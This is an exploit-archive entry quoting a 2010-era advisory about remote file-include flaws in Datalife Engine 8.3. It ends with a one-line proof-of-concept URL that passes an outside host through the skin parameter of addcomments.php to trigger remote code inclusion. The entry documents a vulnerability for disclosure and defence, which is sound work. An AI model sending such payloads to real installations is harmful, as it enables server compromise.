exploit-db-mirror/platforms/php/webapps/33544.txt
Offensive Security 1b0459cbac Updated 05_29_2014
2014-05-29 04:36:31 +00:00

9 lines
No EOL
499 B
Text
Executable file

source: http://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com